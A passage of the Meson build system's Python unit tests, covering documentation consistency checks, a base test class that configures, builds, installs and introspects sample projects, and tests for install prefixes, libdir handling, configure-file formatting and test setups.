options.add(value) self.assertEqual(len(found_entries & options), 0) found_entries |= options self.assertEqual(found_entries, set([ *[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS], *[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE], ])) # Check that `buildtype` table inside `Core options` matches how # setting of builtin options behaves # # Find all tables inside this subsection tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE) # Get the table we want using the header of the first column table = self._get_section_content('buildtype', tables, subcontent2) # Get table row data rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE) env = get_fake_env() for m in rows: buildtype, debug, opt = m.groups() if debug == 'true': debug = True elif debug == 'false': debug = False else: raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group())) env.coredata.set_option(OptionKey('buildtype'), buildtype) self.assertEqual(env.coredata.options[OptionKey('buildtype')].value, buildtype) self.assertEqual(env.coredata.options[OptionKey('optimization')].value, opt) self.assertEqual(env.coredata.options[OptionKey('debug')].value, debug) def test_cpu_families_documented(self): with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) sections = re.finditer(r"^## (.+)$", md, re.MULTILINE) content = self._get_section_content("CPU families", sections, md) # Find the list entries arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)] # Drop the header arches = set(arches[1:]) self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families)) def test_markdown_files_in_sitemap(self): ''' Test that each markdown files in docs/markdown is referenced in sitemap.txt ''' with open("docs/sitemap.txt", encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE)) markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md'] exceptions = ['_Sidebar.md'] for f in markdownfiles: if f not in exceptions: self.assertIn(f, toc) def test_vim_syntax_highlighting(self): ''' Ensure that vim syntax highlighting files were updated for new functions in the global namespace in build files. ''' env = get_fake_env() interp = Interpreter(FakeBuild(env), mock=True) with open('data/syntax-highlighting/vim/syntax/meson.vim') as f: res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE) defined = set([a.strip() for a in res.group().split('\\')][1:]) self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys()))) def test_all_functions_defined_in_ast_interpreter(self): ''' Ensure that the all functions defined in the Interpreter are also defined in the AstInterpreter (and vice versa). ''' env = get_fake_env() interp = Interpreter(FakeBuild(env), mock=True) astint = AstInterpreter('.', '', '') self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys())) def test_mesondata_is_up_to_date(self): from mesonbuild.mesondata import mesondata err_msg = textwrap.dedent(''' ########################################################### ### mesonbuild.mesondata is not up-to-date ### ### Please regenerate it by running tools/gen_data.py ### ########################################################### ''') root_dir = Path(__file__).resolve().parent mesonbuild_dir = root_dir / 'mesonbuild' data_dirs = mesonbuild_dir.glob('**/data') data_files = [] # type: T.List[T.Tuple(str, str)] for i in data_dirs: for p in i.iterdir(): data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())] from pprint import pprint current_files = set(mesondata.keys()) scanned_files = set([x[0] for x in data_files]) self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n') errors = [] for i in data_files: if mesondata[i[0]].sha256sum != i[1]: errors += [i[0]] self.assertListEqual(errors, [], err_msg + 'Files were changed') class BasePlatformTests(unittest.TestCase): prefix = '/usr' libdir = 'lib' def setUp(self): super().setUp() self.maxDiff = None src_root = os.path.dirname(__file__) src_root = os.path.join(os.getcwd(), src_root) self.src_root = src_root # Get the backend # FIXME: Extract this from argv? self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja')) self.meson_args = ['--backend=' + self.backend.name] self.meson_native_file = None self.meson_cross_file = None self.meson_command = python_command + [get_meson_script()] self.setup_command = self.meson_command + self.meson_args self.mconf_command = self.meson_command + ['configure'] self.mintro_command = self.meson_command + ['introspect'] self.wrap_command = self.meson_command + ['wrap'] self.rewrite_command = self.meson_command + ['rewrite'] # Backend-specific build commands self.build_command, self.clean_command, self.test_command, self.install_command, \ self.uninstall_command = get_backend_commands(self.backend) # Test directories self.common_test_dir = os.path.join(src_root, 'test cases/common') self.vala_test_dir = os.path.join(src_root, 'test cases/vala') self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks') self.unit_test_dir = os.path.join(src_root, 'test cases/unit') self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite') self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike') # Misc stuff self.orig_env = os.environ.copy() if self.backend is Backend.ninja: self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do'] else: # VS doesn't have a stable output when no changes are done # XCode backend is untested with unit tests, help welcome! self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)] self.builddirs = [] self.new_builddir() def change_builddir(self, newdir): self.builddir = newdir self.privatedir = os.path.join(self.builddir, 'meson-private') self.logdir = os.path.join(self.builddir, 'meson-logs') self.installdir = os.path.join(self.builddir, 'install') self.distdir = os.path.join(self.builddir, 'meson-dist') self.mtest_command = self.meson_command + ['test', '-C', self.builddir] self.builddirs.append(self.builddir) def new_builddir(self): if not is_cygwin(): # Keep builddirs inside the source tree so that virus scanners # don't complain newdir = tempfile.mkdtemp(dir=os.getcwd()) else: # But not on Cygwin because that breaks the umask tests. See: # https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523 newdir = tempfile.mkdtemp() # In case the directory is inside a symlinked directory, find the real # path otherwise we might not find the srcdir from inside the builddir. newdir = os.path.realpath(newdir) self.change_builddir(newdir) def _print_meson_log(self): log = os.path.join(self.logdir, 'meson-log.txt') if not os.path.isfile(log): print("{!r} doesn't exist".format(log)) return with open(log, 'r', encoding='utf-8') as f: print(f.read()) def tearDown(self): for path in self.builddirs: try: windows_proof_rmtree(path) except FileNotFoundError: pass os.environ.clear() os.environ.update(self.orig_env) super().tearDown() def _run(self, command, *, workdir=None, override_envvars=None): ''' Run a command while printing the stdout and stderr to stdout, and also return a copy of it ''' # If this call hangs CI will just abort. It is very hard to distinguish # between CI issue and test bug in that case. Set timeout and fail loud # instead. if override_envvars is None: env = None else: env = os.environ.copy() env.update(override_envvars) p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True, cwd=workdir, timeout=60 * 5) print(p.stdout) if p.returncode != 0: if 'MESON_SKIP_TEST' in p.stdout: raise unittest.SkipTest('Project requested skipping.') raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout) return p.stdout def init(self, srcdir, *, extra_args=None, default_args=True, inprocess=False, override_envvars=None, workdir=None): self.assertPathExists(srcdir) if extra_args is None: extra_args = [] if not isinstance(extra_args, list): extra_args = [extra_args] args = [srcdir, self.builddir] if default_args: args += ['--prefix', self.prefix] if self.libdir: args += ['--libdir', self.libdir] if self.meson_native_file: args += ['--native-file', self.meson_native_file] if self.meson_cross_file: args += ['--cross-file', self.meson_cross_file] self.privatedir = os.path.join(self.builddir, 'meson-private') if inprocess: try: (returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars) if 'MESON_SKIP_TEST' in out: raise unittest.SkipTest('Project requested skipping.') if returncode != 0: self._print_meson_log() print('Stdout:\n') print(out) print('Stderr:\n') print(err) raise RuntimeError('Configure failed') except Exception: self._print_meson_log() raise finally: # Close log file to satisfy Windows file locking mesonbuild.mlog.shutdown() mesonbuild.mlog.log_dir = None mesonbuild.mlog.log_file = None else: try: out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir) except unittest.SkipTest: raise unittest.SkipTest('Project requested skipping: ' + srcdir) except Exception: self._print_meson_log() raise return out def build(self, target=None, *, extra_args=None, override_envvars=None): if extra_args is None: extra_args = [] # Add arguments for building the target (if specified), # and using the build dir (if required, with VS) args = get_builddir_target_args(self.backend, self.builddir, target) return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars) def clean(self, *, override_envvars=None): dir_args = get_builddir_target_args(self.backend, self.builddir, None) self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars) def run_tests(self, *, inprocess=False, override_envvars=None): if not inprocess: self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars) else: with mock.patch.dict(os.environ, override_envvars): run_mtest_inprocess(['-C', self.builddir]) def install(self, *, use_destdir=True, override_envvars=None): if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) if use_destdir: destdir = {'DESTDIR': self.installdir} if override_envvars is None: override_envvars = destdir else: override_envvars.update(destdir) self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars) def uninstall(self, *, override_envvars=None): self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars) def run_target(self, target, *, override_envvars=None): ''' Run a Ninja target while printing the stdout and stderr to stdout, and also return a copy of it ''' return self.build(target=target, override_envvars=override_envvars) def setconf(self, arg, will_build=True): if not isinstance(arg, list): arg = [arg] if will_build: ensure_backend_detects_changes(self.backend) self._run(self.mconf_command + arg + [self.builddir]) def wipe(self): windows_proof_rmtree(self.builddir) def utime(self, f): ensure_backend_detects_changes(self.backend) os.utime(f) def get_compdb(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name)) try: with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile: contents = json.load(ifile) except FileNotFoundError: raise unittest.SkipTest('Compiler db not found') # If Ninja is using .rsp files, generate them, read their contents, and # replace it as the command for all compile commands in the parsed json. if len(contents) > 0 and contents[0]['command'].endswith('.rsp'): # Pretend to build so that the rsp files are generated self.build(extra_args=['-d', 'keeprsp', '-n']) for each in contents: # Extract the actual command from the rsp file compiler, rsp = each['command'].split(' @') rsp = os.path.join(self.builddir, rsp) # Replace the command with its contents with open(rsp, 'r', encoding='utf-8') as f: each['command'] = compiler + ' ' + f.read() return contents def get_meson_log(self): with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f: return f.readlines() def get_meson_log_compiler_checks(self): ''' Fetch a list command-lines run by meson for compiler checks. Each command-line is returned as a list of arguments. ''' log = self.get_meson_log() prefix = 'Command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def get_meson_log_sanitychecks(self): ''' Same as above, but for the sanity checks that were run ''' log = self.get_meson_log() prefix = 'Sanity check compiler command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def introspect(self, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [self.builddir], universal_newlines=True) return json.loads(out) def introspect_directory(self, directory, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [directory], universal_newlines=True) try: obj = json.loads(out) except Exception as e: print(out) raise e return obj def assertPathEqual(self, path1, path2): ''' Handles a lot of platform-specific quirks related to paths such as separator, case-sensitivity, etc. ''' self.assertEqual(PurePath(path1), PurePath(path2)) def assertPathListEqual(self, pathlist1, pathlist2): self.assertEqual(len(pathlist1), len(pathlist2)) worklist = list(zip(pathlist1, pathlist2)) for i in worklist: if i[0] is None: self.assertEqual(i[0], i[1]) else: self.assertPathEqual(i[0], i[1]) def assertPathBasenameEqual(self, path, basename): msg = '{!r} does not end with {!r}'.format(path, basename) # We cannot use os.path.basename because it returns '' when the path # ends with '/' for some silly reason. This is not how the UNIX utility # `basename` works. path_basename = PurePath(path).parts[-1] self.assertEqual(PurePath(path_basename), PurePath(basename), msg) def assertReconfiguredBuildIsNoop(self): 'Assert that we reconfigured and then there was nothing to do' ret = self.build() self.assertIn('The Meson build system', ret) if self.backend is Backend.ninja: for line in ret.split('\n'): if line in self.no_rebuild_stdout: break else: raise AssertionError('build was reconfigured, but was not no-op') elif self.backend is Backend.vs: # Ensure that some target said that no rebuild was done # XXX: Note CustomBuild did indeed rebuild, because of the regen checker! self.assertIn('ClCompile:\n All outputs are up-to-date.', ret) self.assertIn('Link:\n All outputs are up-to-date.', ret) # Ensure that no targets were built self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertBuildIsNoop(self): ret = self.build() if self.backend is Backend.ninja: self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout) elif self.backend is Backend.vs: # Ensure that some target of each type said that no rebuild was done # We always have at least one CustomBuild target for the regen checker self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret) self.assertIn('ClCompile:\n All outputs are up-to-date.', ret) self.assertIn('Link:\n All outputs are up-to-date.', ret) # Ensure that no targets were built self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertRebuiltTarget(self, target): ret = self.build() if self.backend is Backend.ninja: self.assertIn('Linking target {}'.format(target), ret) elif self.backend is Backend.vs: # Ensure that this target was rebuilt linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE) self.assertRegex(ret, linkre) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) @staticmethod def get_target_from_filename(filename): base = os.path.splitext(filename)[0] if base.startswith(('lib', 'cyg')): return base[3:] return base def assertBuildRelinkedOnlyTarget(self, target): ret = self.build() if self.backend is Backend.ninja: linked_targets = [] for line in ret.split('\n'): if 'Linking target' in line: fname = line.rsplit('target ')[-1] linked_targets.append(self.get_target_from_filename(fname)) self.assertEqual(linked_targets, [target]) elif self.backend is Backend.vs: # Ensure that this target was rebuilt linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE) matches = linkre.findall(ret) self.assertEqual(len(matches), 1, msg=matches) self.assertEqual(self.get_target_from_filename(matches[0]), target) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertPathExists(self, path): m = 'Path {!r} should exist'.format(path) self.assertTrue(os.path.exists(path), msg=m) def assertPathDoesNotExist(self, path): m = 'Path {!r} should not exist'.format(path) self.assertFalse(os.path.exists(path), msg=m) class AllPlatformTests(BasePlatformTests): ''' Tests that should run on all platforms ''' def test_default_options_prefix(self): ''' Tests that setting a prefix in default_options in project() works. Can't be an ordinary test because we pass --prefix to meson there. https://github.com/mesonbuild/meson/issues/1349 ''' testdir = os.path.join(self.common_test_dir, '88 default options') self.init(testdir, default_args=False, inprocess=True) opts = self.introspect('--buildoptions') for opt in opts: if opt['name'] == 'prefix': prefix = opt['value'] break else: raise self.fail('Did not find option "prefix"') self.assertEqual(prefix, '/absoluteprefix') def test_do_conf_file_preserve_newlines(self): def conf_file(in_data, confdata): with temp_filename() as fin: with open(fin, 'wb') as fobj: fobj.write(in_data.encode('utf-8')) with temp_filename() as fout: mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson') with open(fout, 'rb') as fobj: return fobj.read().decode('utf-8') confdata = {'VAR': ('foo', 'bar')} self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n') self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n') def test_do_conf_file_by_format(self): def conf_str(in_data, confdata, vformat): (result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat) return '\n'.join(result) def check_formats(confdata, result): self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result) self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result) self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result) confdata = ConfigurationData() # Key error as they do not exists check_formats(confdata, '/* #undef VAR */\n') # Check boolean confdata.values = {'VAR': (False, 'description')} check_formats(confdata, '#undef VAR\n') confdata.values = {'VAR': (True, 'description')} check_formats(confdata, '#define VAR\n') # Check string confdata.values = {'VAR': ('value', 'description')} check_formats(confdata, '#define VAR value\n') # Check integer confdata.values = {'VAR': (10, 'description')} check_formats(confdata, '#define VAR 10\n') # Check multiple string with cmake formats confdata.values = {'VAR': ('value', 'description')} self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n') self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value') self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n') self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value') # Handles meson format exceptions # Unknown format self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format') # More than 2 params in mesondefine self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson') # Mismatched line with format self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson') self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake') self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@') # Dict value in confdata confdata.values = {'VAR': (['value'], 'description')} self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson') def test_absolute_prefix_libdir(self): ''' Tests that setting absolute paths for --prefix and --libdir work. Can't be an ordinary test because these are set via the command-line. https://github.com/mesonbuild/meson/issues/1341 https://github.com/mesonbuild/meson/issues/1345 ''' testdir = os.path.join(self.common_test_dir, '88 default options') # on Windows, /someabs is *not* an absolute path prefix = 'x:/someabs' if is_windows() else '/someabs' libdir = 'libdir' extra_args = ['--prefix=' + prefix, # This can just be a relative path, but we want to test # that passing this as an absolute path also works '--libdir=' + prefix + '/' + libdir] self.init(testdir, extra_args=extra_args, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: if opt['name'] == 'prefix': self.assertEqual(prefix, opt['value']) elif opt['name'] == 'libdir': self.assertEqual(libdir, opt['value']) def test_libdir_must_be_inside_prefix(self): ''' Tests that libdir is forced to be inside prefix no matter how it is set. Must be a unit test for obvious reasons. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') # libdir being inside prefix is ok if is_windows(): args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32'] else: args = ['--prefix', '/opt', '--libdir', '/opt/lib32'] self.init(testdir, extra_args=args) self.wipe() # libdir not being inside prefix is not ok if is_windows(): args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32'] else: args = ['--prefix', '/usr', '--libdir', '/opt/lib32'] self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args) self.wipe() # libdir must be inside prefix even when set via mesonconf self.init(testdir) if is_windows(): self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False) else: self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False) def test_prefix_dependent_defaults(self): ''' Tests that configured directory paths are set to prefix dependent defaults. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') expected = { '/opt': {'prefix': '/opt', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': 'var', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': 'com', 'sysconfdir': 'etc'}, '/usr': {'prefix': '/usr', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': '/var', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': '/var/lib', 'sysconfdir': '/etc'}, '/usr/local': {'prefix': '/usr/local', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': '/var/local', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib', 'sysconfdir': 'etc'}, # N.B. We don't check 'libdir' as it's platform dependent, see # default_libdir(): } if mesonbuild.mesonlib.default_prefix() == '/usr/local': expected[None] = expected['/usr/local'] for prefix in expected: args = [] if prefix: args += ['--prefix', prefix] self.init(testdir, extra_args=args, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: name = opt['name'] value = opt['value'] if name in expected[prefix]: self.assertEqual(value, expected[prefix][name]) self.wipe() def test_default_options_prefix_dependent_defaults(self): ''' Tests that setting a prefix in default_options in project() sets prefix dependent defaults for other options, and that those defaults can be overridden in default_options or by the command line. ''' testdir = os.path.join(self.common_test_dir, '164 default options prefix dependent defaults') expected = { '': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/sharedstate'}, '--prefix=/usr': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/sharedstate'}, '--sharedstatedir=/var/state': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/var/state'}, '--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf': {'prefix': '/usr', 'sysconfdir': 'sysconf', 'localstatedir': '/var', 'sharedstatedir': '/var/state'}, } for args in expected: self.init(testdir, extra_args=args.split(), default_args=False) opts = self.introspect('--buildoptions') for opt in opts: name = opt['name'] value = opt['value'] if name in expected[args]: self.assertEqual(value, expected[args][name]) self.wipe() def test_clike_get_library_dirs(self): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) for d in cc.get_library_dirs(env): self.assertTrue(os.path.exists(d)) self.assertTrue(os.path.isdir(d)) self.assertTrue(os.path.isabs(d)) def test_static_library_overwrite(self): ''' Tests that static libraries are never appended to, always overwritten. Has to be a unit test because this involves building a project, reconfiguring, and building it again so that `ar` is run twice on the same static library. https://github.com/mesonbuild/meson/issues/1355 ''' testdir = os.path.join(self.common_test_dir, '3 static') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) static_linker = env.detect_static_linker(cc) if is_windows(): raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526') if not isinstance(static_linker, mesonbuild.linkers.ArLinker): raise unittest.SkipTest('static linker is not `ar`') # Configure self.init(testdir) # Get name of static library targets = self.introspect('--targets') self.assertEqual(len(targets), 1) libname = targets[0]['filename'][0] # Build and get contents of static library self.build() before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split() # Filter out non-object-file contents before = [f for f in before if f.endswith(('.o', '.obj'))] # Static library should contain only one object self.assertEqual(len(before), 1, msg=before) # Change the source to be built into the static library self.setconf('-Dsource=libfile2.c') self.build() after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split() # Filter out non-object-file contents after = [f for f in after if f.endswith(('.o', '.obj'))] # Static library should contain only one object self.assertEqual(len(after), 1, msg=after) # and the object must have changed self.assertNotEqual(before, after) def test_static_compile_order(self): ''' Test that the order of files in a compiler command-line while compiling and linking statically is deterministic. This can't be an ordinary test case because we need to inspect the compiler database. https://github.com/mesonbuild/meson/pull/951 ''' testdir = os.path.join(self.common_test_dir, '5 linkstatic') self.init(testdir) compdb = self.get_compdb() # Rules will get written out in this order self.assertTrue(compdb[0]['file'].endswith("libfile.c")) self.assertTrue(compdb[1]['file'].endswith("libfile2.c")) self.assertTrue(compdb[2]['file'].endswith("libfile3.c")) self.assertTrue(compdb[3]['file'].endswith("libfile4.c")) # FIXME: We don't have access to the linker command def test_run_target_files_path(self): ''' Test that run_targets are run from the correct directory https://github.com/mesonbuild/meson/issues/957 ''' testdir = os.path.join(self.common_test_dir, '52 run target') self.init(testdir) self.run_target('check_exists') def test_install_introspection(self): ''' Tests that the Meson introspection API exposes install filenames correctly https://github.com/mesonbuild/meson/issues/829 ''' if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) testdir = os.path.join(self.common_test_dir, '8 install') self.init(testdir) intro = self.introspect('--targets') if intro[0]['type'] == 'executable': intro = intro[::-1] self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a']) self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix]) def test_install_subdir_introspection(self): ''' Test that the Meson introspection API also contains subdir install information https://github.com/mesonbuild/meson/issues/5556 ''' testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) intro = self.introspect('--installed') expected = { 'sub2': 'share/sub2', 'subdir/sub1': 'share/sub1', 'subdir/sub_elided': 'share', 'sub1': 'share/sub1', 'sub/sub1': 'share/sub1', 'sub_elided': 'share', 'nested_elided/sub': 'share', } self.assertEqual(len(intro), len(expected)) # Convert expected to PurePath expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()} intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()} for src, dst in expected_converted.items(): self.assertIn(src, intro_converted) self.assertEqual(dst, intro_converted[src]) def test_install_introspection_multiple_outputs(self): ''' Tests that the Meson introspection API exposes multiple install filenames correctly without crashing https://github.com/mesonbuild/meson/pull/4555 Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438 TODO Change the format to a list officially in a followup PR ''' if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) testdir = os.path.join(self.common_test_dir, '141 custom target multiple outputs') self.init(testdir) intro = self.introspect('--targets') if intro[0]['type'] == 'executable': intro = intro[::-1] self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh']) self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh']) self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None]) self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh']) def test_install_log_content(self): ''' Tests that the install-log.txt is consistent with the installed files and directories. Specifically checks that the log file only contains one entry per file/directory. https://github.com/mesonbuild/meson/issues/4499 ''' testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) self.install() installpath = Path(self.installdir) # Find installed files and directories expected = {installpath: 0} for name in installpath.rglob('*'): expected[name] = 0 # Find logged files and directories with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f: logged = list(map(lambda l: Path(l.strip()), filter(lambda l: not l.startswith('#'), f.readlines()))) for name in logged: self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name)) expected[name] += 1 for name, count in expected.items(): self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name)) self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name)) def test_uninstall(self): exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix) testdir = os.path.join(self.common_test_dir, '8 install') self.init(testdir) self.assertPathDoesNotExist(exename) self.install() self.assertPathExists(exename) self.uninstall() self.assertPathDoesNotExist(exename) def test_forcefallback(self): testdir = os.path.join(self.unit_test_dir, '31 forcefallback') self.init(testdir, extra_args=['--wrap-mode=forcefallback']) self.build() self.run_tests() def test_force_fallback_for(self): testdir = os.path.join(self.unit_test_dir, '31 forcefallback') self.init(testdir, extra_args=['--force-fallback-for=zlib,foo']) self.build() self.run_tests() def test_env_ops_dont_stack(self): ''' Test that env ops prepend/append do not stack, and that this usage issues a warning ''' testdir = os.path.join(self.unit_test_dir, '63 test env does not stack') out = self.init(testdir) self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND') self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND') self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET') self.run_tests() def test_testsetups(self): if not shutil.which('valgrind'): raise unittest.SkipTest('Valgrind not installed.') testdir = os.path.join(self.unit_test_dir, '2 testsetups') self.init(testdir) self.build() # Run tests without setup self.run_tests() with open(os.path.join(self.logdir, 'testlog.txt')) as f: basic_log = f.read() # Run buggy test with setup that has env that will make it fail self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=valgrind']) with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f: vg_log = f.read() self.assertFalse('TEST_ENV is set' in basic_log) self.assertFalse('Memcheck' in basic_log) self.assertTrue('TEST_ENV is set' in vg_log) self.assertTrue('Memcheck' in vg_log) # Run buggy test with setup without env that will pass self._run(self.mtest_command + ['--setup=wrapper']) # Setup with no properties works self._run(self.mtest_command + ['--setup=empty']) # Setup with only env works self._run(self.mtest_command + ['--setup=onlyenv']) self._run(self.mtest_command + ['--setup=onlyenv2']) self._run(self.mtest_command + ['--setup=onlyenv3']) # Setup with only a timeout works self._run(self.mtest_command + ['--setup=timeout']) def test_testsetup_selection(self): 